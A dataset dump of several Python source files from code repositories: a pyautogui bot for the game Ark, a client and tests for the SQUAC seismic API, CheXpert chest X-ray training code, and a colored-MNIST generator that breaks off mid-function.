index
int64 | repo_name
string | branch_name
string | path
string | content
string | import_graph
string |
|---|---|---|---|---|---|
27,799
|
OpenElement-GachaBot/OpenElement
|
refs/heads/main
|
/ark.py
|
import time
import pyautogui
import screen
import cv2
import numpy as np
inventory_template = cv2.imread("templates/inventory_template.png", cv2.IMREAD_GRAYSCALE)
inventory_template = cv2.Canny(inventory_template, 100, 200)
img = cv2.imread("templates/bed_button_corner.png", cv2.IMREAD_GRAYSCALE)
bed_button_edge = cv2.Canny(img,100,200)
lookUpDelay = 3
lookDownDelay = 1.75
setFps = 25
firstRun = True
def limitFps():
global setFps
pyautogui.press("tab")
time.sleep(0.2)
pyautogui.typewrite("t.maxfps " + str(setFps), interval=0.02)
pyautogui.press("enter")
def setGamma():
pyautogui.press("tab")
time.sleep(0.2)
pyautogui.typewrite("gamma 5", interval=0.02)
pyautogui.press("enter")
def setParams(up, down, fps):
global lookUpDelay
global lookDownDelay
global setFps
lookUpDelay = up
lookDownDelay = down
setFps = fps
def lookUp():
global lookUpDelay
pyautogui.keyDown('up')
time.sleep(lookUpDelay)
pyautogui.keyUp('up')
def lookDown():
global lookDownDelay
pyautogui.keyDown('down')
time.sleep(lookDownDelay)
pyautogui.keyUp('down')
def enterBedName(name):
pyautogui.moveTo(336, 986, duration=0.1)
pyautogui.click()
pyautogui.keyDown('ctrl')
pyautogui.press('a')
pyautogui.keyUp('ctrl')
pyautogui.press('backspace')
pyautogui.typewrite(name, interval=0.05)
time.sleep(0.5)
def checkBedButtonEdge():
img = screen.getGrayScreen()[950:1100,580:620]
img = cv2.Canny(img, 100, 200)
res = cv2.matchTemplate(img, bed_button_edge, cv2.TM_CCOEFF)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
print(max_val)
if(max_val > 2500000):
return True
return False
def bedSpawn(bedName, x, y):
global firstRun
time.sleep(1.5)
enterBedName(bedName)
time.sleep(0.25)
pyautogui.moveTo(x, y)
time.sleep(0.25)
pyautogui.click()
time.sleep(0.25)
if(checkBedButtonEdge):
pyautogui.moveTo(755, 983)
time.sleep(0.25)
pyautogui.click()
time.sleep(12)
pyautogui.press('c')
if(firstRun == True):
firstRun = False
limitFps()
setGamma()
return True
else:
return False
def inventoryIsOpen():# {{{
img = screen.getGrayScreen()
img = cv2.Canny(img, 100, 200)
res = cv2.matchTemplate(img, inventory_template, cv2.TM_CCOEFF)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
if(max_val > 40000000):
return True
return False
def closeInventory():# {{{
while(inventoryIsOpen() == True):
pyautogui.moveTo(1816, 37)
pyautogui.click()
time.sleep(2.0)
if(inventoryIsOpen() == False):
return
def craft(item, timesToPressA):
searchStructureStacks(item)
pyautogui.moveTo(1290, 280)
pyautogui.click()
for i in range(0, timesToPressA):
pyautogui.press('a')
time.sleep(0.25)
def searchMyStacks(thing):# {{{
pyautogui.moveTo(144, 191)
pyautogui.click()
time.sleep(0.5)
pyautogui.keyDown('ctrl')
time.sleep(0.2)
pyautogui.press('a')
pyautogui.keyUp('ctrl')
pyautogui.typewrite(thing, interval=0.02)
time.sleep(0.5)
def searchStructureStacks(thing):# {{{
pyautogui.moveTo(1322, 191)
pyautogui.click()
time.sleep(0.5)
pyautogui.keyDown('ctrl')
time.sleep(0.2)
pyautogui.press('a')
pyautogui.keyUp('ctrl')
pyautogui.typewrite(thing, interval=0.02)
time.sleep(0.5)
# }}}
def takeStacks(thing, count):# {{{
searchStructureStacks(thing)
pyautogui.moveTo(1287, 290)
pyautogui.click()
for i in range(count):
pyautogui.press('t')
time.sleep(1)
# }}}
def takeAll(thing = ""):
if(thing != ""):
time.sleep(0.5)
pyautogui.moveTo(1285, 180)
pyautogui.click()
time.sleep(0.1)
pyautogui.keyDown('ctrl')
pyautogui.press('a')
pyautogui.keyUp('ctrl')
pyautogui.typewrite(thing, interval=0.01)
time.sleep(0.5)
pyautogui.moveTo(1424, 190)
pyautogui.click()
time.sleep(0.5)
def transferAll(thing = ""):# {{{
if(thing != ""):
pyautogui.moveTo(198, 191)
pyautogui.click()
time.sleep(0.2)
pyautogui.keyDown('ctrl')
pyautogui.press('a')
pyautogui.keyUp('ctrl')
pyautogui.typewrite(thing, interval=0.005)
time.sleep(0.5)
pyautogui.moveTo(351, 186)
pyautogui.click()
time.sleep(0.5)
def transferStacks(thing, count):# {{{
pyautogui.moveTo(198, 191)
pyautogui.click()
time.sleep(0.2)
pyautogui.keyDown('ctrl')
pyautogui.press('a')
pyautogui.keyUp('ctrl')
pyautogui.typewrite(thing, interval=0.005)
time.sleep(0.5)
counter = 0
pyautogui.moveTo(170, 280)
pyautogui.click()
time.sleep(1.0)
while(counter < count):
pyautogui.press('t')
time.sleep(0.5)
counter += 1
def openInventory():
pyautogui.press('f')
time.sleep(2.0)
count = 0
while((inventoryIsOpen() == False) and (count < 6)):
count += 1
pyautogui.press('f')
time.sleep(2.0)
if(getBedScreenCoords() != None):
pyautogui.press('esc')
time.sleep(2.0)
if(count >= 6):
return False
return True
def tTransferTo(nRows):
time.sleep(0.5)
pyautogui.moveTo(167, 280, 0.1)
pyautogui.click()
for j in range(nRows): #transfer a few rows back to the gacha
for i in range(6):
pyautogui.moveTo(167+(i*95), 280, 0.1)
pyautogui.press('t')
def tTransferFrom(nRows):
pyautogui.moveTo(1288, 280, 0.1)
pyautogui.click()
for j in range(nRows):
for i in range(6):
pyautogui.moveTo(1288+(i*95), 280, 0.1)
pyautogui.press('t')
def getBedScreenCoords():
roi = screen.getScreen()
lower_blue = np.array([90,200,200])
upper_blue = np.array([100,255,255])
hsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, lower_blue, upper_blue)
masked_template = cv2.bitwise_and(roi, roi, mask= mask)
gray_roi = cv2.cvtColor(masked_template, cv2.COLOR_BGR2GRAY)
bed_template = cv2.imread('templates/bed_icon_template.png', cv2.IMREAD_COLOR)
hsv = cv2.cvtColor(bed_template, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, lower_blue, upper_blue)
masked_template = cv2.bitwise_and(bed_template, bed_template, mask= mask)
bed_template = cv2.cvtColor(masked_template, cv2.COLOR_BGR2GRAY)
res = cv2.matchTemplate(gray_roi, bed_template, cv2.TM_CCOEFF)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
if(max_val > 8000000):
return (max_loc[0]+14, max_loc[1]+14)
return None
def dropItems(thing):
pyautogui.moveTo(198, 191)
pyautogui.click()
time.sleep(0.2)
pyautogui.keyDown('ctrl')
pyautogui.press('a')
pyautogui.keyUp('ctrl')
pyautogui.typewrite(thing, interval=0.02)
time.sleep(0.5)
pyautogui.moveTo(412, 190)
pyautogui.click()
def accessBed():
while(getBedScreenCoords() == None):
lookDown()
pyautogui.press('e')
time.sleep(1.5)
if(inventoryIsOpen()):
closeInventory()
def takeAllOverhead():
lookUp()
openInventory()
takeAll()
closeInventory()
lookDown()
def depositOverhead():
lookUp()
pyautogui.press('e')
lookDown()
|
{"/gacha.py": ["/ark.py"]}
|
27,805
|
pnsn/squacapipy-old
|
refs/heads/master
|
/test/test_squacapi.py
|
from squacapipy.squacapi import Response, Network, Channel
from unittest.mock import patch
'''to run
$:pytest --verbose -s test/test_squacapi.py && flake8
or
pytest && flake8
'''
'''Tests are really just testing class instantiaion since the response
object is mocked.
'''
@patch.object(Network, 'get')
def test_get_networks(mock_get):
res = Response(200, [{'code': 'uw'}, {'code': 'cc'}], {})
mock_get.return_value = res
'''should get all networks '''
net = Network()
response = net.get()
assert response.status_code == 200
assert len(response.body) > 1
@patch.object(Network, 'post')
def test_create_network(mock_post):
res = Response(201, [{'code': 'uw'}], {})
mock_post.return_value = res
net = Network()
payload = {
'code': 'f2',
'name': 'FU'
}
response = net.post(payload)
assert response.status_code == 201
@patch.object(Network, 'put')
def test_update_network(mock_put):
res = Response(200, [{'code': 'f1', 'name': 'FR',
'description': 'This is the description'}], {})
mock_put.return_value = res
net = Network()
payload = {
'code': 'f2',
'name': 'FR',
'description': "This is the description"
}
response = net.put('f2', payload)
assert response.status_code == 200
@patch.object(Channel, 'get')
def test_get_channels(mock_get):
res = Response(200, [
{'code': 'EHZ', 'name': "EHZ", 'station_code': 'RCM',
'station_name': 'Muir', "sample_rate": 200, 'loc': '--',
'lat': 45.0, 'lon': -122.0, 'elev': 2000, 'network_id': 1},
{'code': 'EHE', 'name': "EHE", 'station_code': 'RCM',
'station_name': 'Muir', "sample_rate": 200, 'loc': '--',
'lat': 45.0, 'lon': -122.0, 'elev': 2000, 'network_id': 1}], {})
mock_get.return_value = res
'''should get all networks '''
channel = Channel()
response = channel.get()
assert response.status_code == 200
assert len(response.body) > 1
|
{"/test/test_squacapi.py": ["/squacapipy/squacapi.py"], "/squacapipy/squacapi.py": ["/squacapipy/errors.py"]}
|
27,806
|
pnsn/squacapipy-old
|
refs/heads/master
|
/squacapipy/errors.py
|
'''error classes '''
class APITokenMissingError(Exception):
'''raise error on missing key'''
pass
class APIBaseUrlError(Exception):
'''raise error on base url param'''
pass
|
{"/test/test_squacapi.py": ["/squacapipy/squacapi.py"], "/squacapipy/squacapi.py": ["/squacapipy/errors.py"]}
|
27,807
|
pnsn/squacapipy-old
|
refs/heads/master
|
/squacapipy/squacapi.py
|
import requests
import os
import json
from squacapipy.errors import APITokenMissingError, APIBaseUrlError
from datetime import datetime
API_TOKEN = os.getenv('SQUAC_API_TOKEN')
API_BASE_URL = os.getenv('SQUAC_API_BASE')
if API_TOKEN is None:
raise APITokenMissingError(
"All methods require an API key"
)
if API_BASE_URL is None:
raise APIBaseUrlError(
"All methods require a base API url"
)
HEADERS = {'Content-Type': 'application/json',
'Authorization': API_TOKEN}
def serialize_object(obj):
'''for objects that don't natively serialize such as datetime'''
if isinstance(obj, datetime):
return obj.__str__()
class Response():
'''simple custom response object
takes requests obj text and turns into
python dict
'''
def __init__(self, status_code, body, response_header):
self.status_code = status_code
self.body = body
self.response_header = response_header
class SquacapiBase():
def __init__(self, app, resource):
self. app = app
self.resource = resource
def uri(self):
return API_BASE_URL + "/" + self.app + "/" + self.resource + "/"
def make_response(self, response):
'''raise for errors, returns Response obj'''
try:
response.raise_for_status()
except requests.exceptions.HTTPError as e:
return Response(e.response.status_code,
json.loads(e.response.text), e.response.headers)
return Response(response.status_code,
json.loads(response.text), response.headers)
def get(self, **kwargs):
'''get resources'''
uri = self.uri()
response = requests.get(uri, headers=HEADERS, params=kwargs)
return self.make_response(response)
def post(self, payload):
'''create resources'''
uri = self.uri()
response = requests.post(
uri,
headers=HEADERS,
data=json.dumps(payload, default=serialize_object))
return self.make_response(response)
def put(self, id, payload):
'''update resource
Must have trailing slash after id!!
'''
uri = self.uri() + id + "/"
response = requests.put(uri, headers=HEADERS,
data=json.dumps(payload))
return self.make_response(response)
'''Nslc classes
* NslcBase inherits from SquacapiBase,
* Network, Channel, and Group inherit from NslcBase
'''
class NslcBase(SquacapiBase):
def __init__(self, resource):
app = "nslc"
super().__init__(app, resource)
class Network(NslcBase):
def __init__(self):
resource = "networks"
super().__init__(resource)
class Channel(NslcBase):
def __init__(self):
resource = "channels"
super().__init__(resource)
class Group(NslcBase):
def __init__(self):
resource = "groups"
super().__init__(resource)
'''Measurement classes
* MeasurentBase inherits from SquacapiBase,
* Measurement, and Metric inherit from MeasurentBase
'''
class MeasurementBase(SquacapiBase):
def __init__(self, resource):
app = "measurement"
super().__init__(app, resource)
class Metric(MeasurementBase):
def __init__(self):
resource = "metrics"
super().__init__(resource)
class Measurement(MeasurementBase):
def __init__(self):
resource = "measurements"
super().__init__(resource)
class DashboardBase(SquacapiBase):
def __init__(self, resource):
app = "dashboard"
super().__init__(app, resource)
class Dashboard(DashboardBase):
def __init__(self):
resource = "dashboards"
super().__init__(resource)
class Widget(DashboardBase):
def __init__(self):
resource = "widgets"
super().__init__(resource)
class WidgetType(DashboardBase):
def __init__(self):
resource = "widgettypes"
super().__init__(resource)
|
{"/test/test_squacapi.py": ["/squacapipy/squacapi.py"], "/squacapipy/squacapi.py": ["/squacapipy/errors.py"]}
|
27,811
|
Alaqian/chexpert_old
|
refs/heads/master
|
/trainCnn.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 20 21:16:02 2019
@author: Mirac
"""
def train_cnn(PATH_TO_MAIN_FOLDER, LR, WEIGHT_DECAY, UNCERTAINTY="zeros", USE_MODEL=0):
"""
Train a model with chexpert data using the given hyperparameters
Args:
PATH_TO_MAIN_FOLDER: path where the extracted chexpert data is located
LR: learning rate
WEIGHT_DECAY: weight decay parameter for SGD
UNCERTAINTY: the uncertainty method to be used in training
USE_MODEL: specify the checkpoint object if you want to continue
training
Returns:
preds: torchvision model predictions on test fold with ground truth for comparison
aucs: AUCs for each train,test tuple
"""
NUM_EPOCHS = 8
BATCH_SIZE = 32
if USE_MODEL == 0:
try:
rmtree(os.path.join('results',UNCERTAINTY))
except BaseException:
pass # directory doesn't yet exist, no need to clear it
os.makedirs(os.path.join('results',UNCERTAINTY))
# use imagenet mean,std for normalization
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
N_LABELS = 14 # we are predicting 14 labels
# define torchvision transforms
data_transforms = {
'train': transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.Scale(224),
# because scale doesn't always give 224 x 224, this ensures 224 x
# 224
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean, std)
]),
'valid': transforms.Compose([
transforms.Scale(224),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean, std)
]),
}
# create train/val dataloaders
transformed_datasets = {}
transformed_datasets['train'] = CheXpertDataset(
path_to_main_folder=PATH_TO_MAIN_FOLDER,
fold='train',
transform=data_transforms['train'],
uncertainty=UNCERTAINTY)
transformed_datasets['valid'] = CheXpertDataset(
path_to_main_folder=PATH_TO_MAIN_FOLDER,
fold='valid',
transform=data_transforms['valid'],
uncertainty=UNCERTAINTY)
dataloaders = {}
dataloaders['train'] = torch.utils.data.DataLoader(
transformed_datasets['train'],
batch_size=BATCH_SIZE,
shuffle=True,
num_workers=8)
dataloaders['valid'] = torch.utils.data.DataLoader(
transformed_datasets['valid'],
batch_size=BATCH_SIZE,
shuffle=True,
num_workers=8)
# please do not attempt to train without GPU as will take excessively long
if not use_gpu:
raise ValueError("Error, requires GPU")
if not USE_MODEL == 0:
model = USE_MODEL['model']
starting_epoch = USE_MODEL['epoch']
else:
starting_epoch = 0
model = models.densenet121(pretrained=True)
num_ftrs = model.classifier.in_features
# add final layer with # outputs in same dimension of labels with sigmoid
# activation
if UNCERTAINTY in ["multiclass", 'weighted_multiclass']:
model.classifier = nn.Sequential(
nn.Linear(num_ftrs, 3 * N_LABELS), nn.Sigmoid())
else:
model.classifier = nn.Sequential(
nn.Linear(num_ftrs, N_LABELS), nn.Sigmoid())
# put model on GPU
model = model.cuda()
# define criterion, optimizer for training
if UNCERTAINTY == "ignore":
criterion = BCEwithIgnore()
elif UNCERTAINTY == "multiclass":
criterion = nn.CrossEntropyLoss()
elif UNCERTAINTY == 'weighted_multiclass':
label_weights = torch.tensor(transformed_datasets['train'].getWeights(uncertainty='weighted_multiclass'))
label_weights = label_weights.to(torch.device("cuda"))
criterion = WeightedCrossEntropy(label_weights)
elif UNCERTAINTY == "weighted_zeros":
label_weights = torch.tensor(transformed_datasets['train'].getWeights())
label_weights = label_weights.to(torch.device("cuda"))
criterion = WeightedBCE(label_weights)
else:
criterion = nn.BCELoss()
optimizer = optim.SGD(
filter(
lambda p: p.requires_grad,
model.parameters()),
lr=LR,
momentum=0.9,
weight_decay=WEIGHT_DECAY)
dataset_sizes = {x: len(transformed_datasets[x]) for x in ['train', 'valid']}
# train model
model, best_epoch = train_model(model, criterion, optimizer, LR, num_epochs=NUM_EPOCHS,
dataloaders=dataloaders, dataset_sizes=dataset_sizes, weight_decay=WEIGHT_DECAY,
uncertainty=UNCERTAINTY,
starting_epoch=starting_epoch)
# get preds and AUCs on test fold
preds, aucs = make_pred_multilabel(data_transforms,
model,
PATH_TO_MAIN_FOLDER,
UNCERTAINTY,
N_LABELS)
return preds, aucs
|
{"/camUtils.py": ["/chexpertDataset.py"]}
|
27,812
|
Alaqian/chexpert_old
|
refs/heads/master
|
/chexpertDataset.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 20 21:10:18 2019
@author: Mirac
"""
import pandas as pd
import numpy as np
from torch.utils.data import Dataset
import os
from PIL import Image
from sklearn.model_selection import train_test_split
class CheXpertDataset(Dataset):
"""
Dataset class for the chexpert dataset
Args:
path_to_main_folder: path where the extracted chexpert data is located
fold: choose 'train', 'valid' or 'test'
transform: torchvision transforms to be applied to raw images
uncertainty: the uncertainty method to be used in training
"""
def __init__(
self,
path_to_main_folder,
fold,
transform=None,
uncertainty="zeros"):
self.transform = transform
self.path_to_main_folder = path_to_main_folder
if fold == 'test': #Use the validation set in the chexpert dataset as the test set
self.df = pd.read_csv(os.path.join(path_to_main_folder,
'CheXpert-v1.0-small',
'valid.csv'))
elif fold == 'train': #Use 80% of the train set in the chexpert dataset as the train set
self.df = pd.read_csv(os.path.join(path_to_main_folder,
'CheXpert-v1.0-small',
'train.csv'))
self.df, _ = train_test_split(self.df, test_size=0.2, random_state=42)
elif fold == 'valid': #Use 20% of the train set in the chexpert dataset as the validation set
self.df = pd.read_csv(os.path.join(path_to_main_folder,
'CheXpert-v1.0-small',
'train.csv'))
_, self.df = train_test_split(self.df, test_size=0.2, random_state=42)
self.df = self.df.set_index("Path") #Use the path of the image directory as the index
self.df = self.df.drop(['Sex', 'Age', 'Frontal/Lateral','AP/PA'], axis=1) #Drop these columns because we won't be needing them
self.df = self.df.fillna(value=0) #Fill in the missing values with zeros (negative)
if uncertainty == 'zeros': #If the zeros uncertainty method is used, treat all uncertain labels as zeros
self.df = self.df.replace(-1, 0)
elif uncertainty == 'ones': #If the ones uncertainty method is used, treat all uncertain labels as ones
self.df = self.df.replace(-1, 1)
elif uncertainty == 'weighted_zeros':
self.df = self.df.replace(-1,0)
self.PRED_LABEL = [
'No Finding',
'Enlarged Cardiomediastinum',
'Cardiomegaly',
'Lung Opacity',
'Lung Lesion',
'Edema',
'Consolidation',
'Pneumonia',
'Atelectasis',
'Pneumothorax',
'Pleural Effusion',
'Pleural Other',
'Fracture',
'Support Devices'] #These are the 14 labels we try to predict
def __len__(self):
return len(self.df)
def __getitem__(self, idx):
image = Image.open(
os.path.join(
self.path_to_main_folder,
self.df.index[idx]))
image = image.convert('RGB')
label = np.zeros(len(self.PRED_LABEL), dtype=int)
for i in range(0, len(self.PRED_LABEL)):
# can leave zero if zero, else make one
if(self.df[self.PRED_LABEL[i].strip()].iloc[idx].astype('int') in set([-1,1])):
label[i] = self.df[self.PRED_LABEL[i].strip()
].iloc[idx].astype('int')
if self.transform:
image = self.transform(image)
return (image, label,self.df.index[idx])
def getWeights(self, uncertainty='weighted_zeros'): #The weight array for weighted cross entropy methods
if uncertainty == 'weighted_zeros':
positives = self.df.sum(axis=0)[-14:] / self.df.shape[0]
negatives = 1 - positives
weights = 2 * negatives
elif uncertainty == 'weighted_multiclass':
counts = self.df.count()[-14:]
uncertains = self.df.isin([-1]).sum(axis=0)[-14:]
positives = self.df.isin([1]).sum(axis=0)[-14:]
negatives = self.df.isin([0]).sum(axis=0)[-14:]
weights = [(counts - uncertains) / counts * 3/2, \
(counts - negatives) / counts * 3/2, \
(counts - positives) / counts * 3/2]
weights = np.transpose(np.array(weights))
return weights
|
{"/camUtils.py": ["/chexpertDataset.py"]}
|
27,813
|
Alaqian/chexpert_old
|
refs/heads/master
|
/lossFunctions.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 20 21:15:28 2019
@author: Mirac
"""
import torch
class BCEwithIgnore(torch.nn.Module):
def _init_(self):
super(BCEwithIgnore, self)._init_()
def forward(self, score, y):
zeros = torch.zeros_like(y)
ones = torch.ones_like(y)
num_uncertain = torch.sum(torch.where(y==-1, ones, zeros))
positive = torch.where(y==-1, zeros, y)
negative = torch.where(y==-1, ones, y)
p = torch.log(score)
one_minus_p = torch.log(1 - score)
loss = -1 * torch.sum(p * positive + (1-negative) * one_minus_p) / ( y.numel() - num_uncertain)
return loss
class WeightedBCE(torch.nn.Module):
def __init__(self, weight):
super(WeightedBCE, self).__init__()
self.w = weight
def forward(self, score, y):
loss = -1 * torch.mean(y * torch.log(score) * self.w +\
(1-y) * torch.log(1 - score) * (2 - self.w))
return loss
class WeightedCrossEntropy(torch.nn.Module):
def __init__(self, weight):
super(WeightedCrossEntropy, self).__init__()
self.w = weight
def forward(self, output, y):
scores = torch.softmax(output.view(-1, 3), dim=1)
y = y.view(-1, 1)
y_onehot = torch.zeros((y.shape[0], 3), device=y.device)
y_onehot.scatter_(1, y, 1)
weights = self.w.repeat(len(y)// 14 , 1)
loss = - torch.mean(torch.log(scores).type(torch.double) * y_onehot.type(torch.double) * weights.type(torch.double))
return loss
|
{"/camUtils.py": ["/chexpertDataset.py"]}
|
27,814
|
Alaqian/chexpert_old
|
refs/heads/master
|
/makePredictions.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 20 21:16:51 2019
@author: Mirac
"""
import torch
import pandas as pd
from torchvision import transforms, utils
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms, utils
import sklearn
import sklearn.metrics as sklm
from torch.autograd import Variable
import numpy as np
def make_pred_multilabel(data_transforms, model, PATH_TO_MAIN_FOLDER, UNCERTAINTY, N_LABELS, epoch=0):
"""
Gives predictions for test fold and calculates AUCs using previously trained model
Args:
data_transforms: torchvision transforms to preprocess raw images; same as validation transforms
model: the model trained on chexpert images
PATH_TO_MAIN_FOLDER: path where the extracted chexpert data is located
Returns:
pred_df: dataframe containing individual predictions and ground truth for each test image
auc_df: dataframe containing aggregate AUCs by train/test tuples
"""
# calc preds in batches of 32, can reduce if your GPU has less RAM
BATCH_SIZE = 32
# set model to eval mode; required for proper predictions given use of batchnorm
model.train(False)
# create dataloader
dataset = CheXpertDataset(
path_to_main_folder=PATH_TO_MAIN_FOLDER,
fold="test",
transform=data_transforms['valid'],
uncertainty=UNCERTAINTY)
dataloader = torch.utils.data.DataLoader(
dataset, BATCH_SIZE, shuffle=False, num_workers=8)
# create empty dfs
pred_df = pd.DataFrame(columns=["Image Index"])
true_df = pd.DataFrame(columns=["Image Index"])
# iterate over dataloader
for i, data in enumerate(dataloader):
inputs, labels, _ = data
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
true_labels = labels.cpu().data.numpy()
batch_size = true_labels.shape
if UNCERTAINTY in ["multiclass", 'weighted_multiclass']:
nn_outputs = model(inputs)
multiclass_probs = torch.softmax(nn_outputs.view(-1, 3), dim=1)
outputs = torch.softmax(multiclass_probs[:,[1,2]], dim=1)[:,1].view(-1, N_LABELS)
else:
outputs = model(inputs)
probs = outputs.cpu().data.numpy()
# get predictions and true values for each item in batch
for j in range(0, batch_size[0]):
thisrow = {}
truerow = {}
thisrow["Image Index"] = dataset.df.index[BATCH_SIZE * i + j]
truerow["Image Index"] = dataset.df.index[BATCH_SIZE * i + j]
# iterate over each entry in prediction vector; each corresponds to
# individual label
for k in range(len(dataset.PRED_LABEL)):
thisrow["prob_" + dataset.PRED_LABEL[k]] = probs[j, k]
truerow[dataset.PRED_LABEL[k]] = true_labels[j, k]
pred_df = pred_df.append(thisrow, ignore_index=True)
true_df = true_df.append(truerow, ignore_index=True)
if(i % 10 == 0):
print(str(i * BATCH_SIZE))
auc_df = pd.DataFrame(columns=["label", "auc"])
# calc AUCs
for column in true_df:
if column not in [
'No Finding',
'Enlarged Cardiomediastinum',
'Cardiomegaly',
'Lung Opacity',
'Lung Lesion',
'Edema',
'Consolidation',
'Pneumonia',
'Atelectasis',
'Pneumothorax',
'Pleural Effusion',
'Pleural Other',
'Fracture',
'Support Devices']:
continue
actual = true_df[column]
pred = pred_df["prob_" + column]
thisrow = {}
thisrow['label'] = column
thisrow['auc'] = np.nan
try:
thisrow['auc'] = sklm.roc_auc_score(
actual.as_matrix().astype(int), pred.as_matrix())
except BaseException:
print("can't calculate auc for " + str(column))
auc_df = auc_df.append(thisrow, ignore_index=True)
if epoch == 0:
pred_df.to_csv(os.path.join('results',UNCERTAINTY,'preds.csv'), index=False)
auc_df.to_csv(os.path.join('results',UNCERTAINTY,'aucs.csv'), index=False)
else:
pred_df.to_csv(os.path.join('results',UNCERTAINTY,'preds'+ str(epoch) + '.csv'), index=False)
auc_df.to_csv(os.path.join('results',UNCERTAINTY,'aucs' + str(epoch) + '.csv'), index=False)
return pred_df, auc_df
|
{"/camUtils.py": ["/chexpertDataset.py"]}
|
27,815
|
Alaqian/chexpert_old
|
refs/heads/master
|
/camUtils.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 20 21:17:34 2019
@author: Mirac
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import transforms
from chexpertDataset import CheXpertDataset
### CLASS ACTIVATION ####
class HookModel(nn.Module):
def __init__(self, model):
super(HookModel, self).__init__()
self.gradients = None
self.features = model.features
self.classifier = model.classifier
def activations_hook(self, grad):
self.gradients = grad
def forward(self, x):
## your forward pass
x = self.features(x)
h = x.register_hook(self.activations_hook)
out = F.relu(x, inplace=True)
out = F.adaptive_avg_pool2d(out, (1, 1))
out = out.view(x.size(0), -1)
out = self.classifier(out)
return out
def get_activations_gradient(self):
return self.gradients
# method for the activation exctraction
def get_activations(self, x):
return self.features(x)
def create_dataloader_cam(PATH_TO_MAIN_FOLDER = "/content", UNCERTAINTY = 'weighted_multiclass'):
# use imagenet mean,std for normalization
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
N_LABELS = 14 # we are predicting 14 labels
BATCH_SIZE = 1
data_transforms = {
'train': transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.Scale(224),
# because scale doesn't always give 224 x 224, this ensures 224 x
# 224
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean, std)
]),
'valid': transforms.Compose([
transforms.Scale(224),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean, std)
]),
}
# create train/val dataloaders
transformed_datasets = {}
transformed_datasets['train'] = CheXpertDataset(
path_to_main_folder=PATH_TO_MAIN_FOLDER,
fold='train',
transform=data_transforms['train'],
uncertainty=UNCERTAINTY)
transformed_datasets['valid'] = CheXpertDataset(
path_to_main_folder=PATH_TO_MAIN_FOLDER,
fold='valid',
transform=data_transforms['valid'],
uncertainty=UNCERTAINTY)
dataloaders = {}
dataloaders['train'] = torch.utils.data.DataLoader(
transformed_datasets['train'],
batch_size=BATCH_SIZE,
shuffle=True,
num_workers=8)
dataloaders['valid'] = torch.utils.data.DataLoader(
transformed_datasets['valid'],
batch_size=BATCH_SIZE,
shuffle=True,
num_workers=8)
return dataloaders
def rgb2gray(rgb):
return np.dot(rgb[...,:3], [0.2989, 0.5870, 0.1140])
|
{"/camUtils.py": ["/chexpertDataset.py"]}
|
27,816
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/gen_color_mnist.py
|
import torchvision
import torch
import numpy as np
import torchvision.transforms as transforms
import tqdm
from torch.autograd import Variable
import argparse
import os
data_path = 'datasets/'
parser = argparse.ArgumentParser(description='Generate colored MNIST')
# Hyperparams
parser.add_argument('--cpr', nargs='+', type=float, default=[0.5,0.5],
help='color choice is made corresponding to a class with these probability')
args = parser.parse_args()
trans = ([transforms.ToTensor()])
trans = transforms.Compose(trans)
fulltrainset = torchvision.datasets.MNIST(root=data_path, train=True, download=True, transform=trans)
trainloader = torch.utils.data.DataLoader(fulltrainset, batch_size=2000, shuffle=False, num_workers=2, pin_memory=True)
test_set = torchvision.datasets.MNIST(root=data_path, train=False, download=True, transform=trans)
testloader = torch.utils.data.DataLoader(test_set, batch_size=2000, shuffle=False, num_workers=2, pin_memory=True)
nb_classes = 10
# generate color codes
def get_color_codes(cpr):
C = np.random.rand(len(cpr), nb_classes,3)
C = C/np.max(C, axis=2)[:,:,None]
print(C.shape)
return C
def gen_fgbgcolor_data(loader, img_size=(3,28,28), cpr=[0.5, 0.5], noise=10.):
if cpr is not None:
assert sum(cpr)==1, '--cpr must be a non-negative list which sums to 1'
Cfg = get_color_codes(cpr)
Cbg = get_color_codes(cpr)
else:
Cfg = get_color_codes([1])
Cbg = get_color_codes([1])
tot_iters = len(loader)
for i in tqdm.tqdm(range(tot_iters), total=tot_iters):
x, targets = next(iter(loader))
assert len(x.size())==4, 'Something is wrong, size of input x should be 4 dimensional (B x C x H x W; perhaps number of channels is degenrate? If so, it should be 1)'
targets = targets.cpu().numpy()
bs = targets.shape[0]
x = (((x*255)>150)*255).type('torch.FloatTensor')
x_rgb = torch.ones(x.size(0),3, x.size()[2], x.size()[3]).type('torch.FloatTensor')
x_rgb = x_rgb* x
x_rgb_fg = 1.*x_rgb
color_choice = np.argmax(np.random.multinomial(1, cpr, targets.shape[0]), axis=1) if cpr is not None else 0
c = Cfg[color_choice,targets] if cpr is not None else Cfg[color_choice,np.random.randint(nb_classes, size=targets.shape[0])]
c = c.reshape(-1, 3, 1, 1)
c= torch.from_numpy(c).type('torch.FloatTensor')
x_rgb_fg[:,0] = x_rgb_fg[:,0]* c[:,0]
x_rgb_fg[:,1] = x_rgb_fg[:,1]* c[:,1]
x_rgb_fg[:,2] = x_rgb_fg[:,2]* c[:,2]
bg = (255-x_rgb)
# c = C[targets] if np.random.rand()>cpr else C[np.random.randint(C.shape[0], size=targets.shape[0])]
color_choice = np.argmax(np.random.multinomial(1, cpr, targets.shape[0]), axis=1) if cpr is not None else 0
c = Cbg[color_choice,targets] if cpr is not None else Cbg[color_choice,np.random.randint(nb_classes, size=targets.shape[0])]
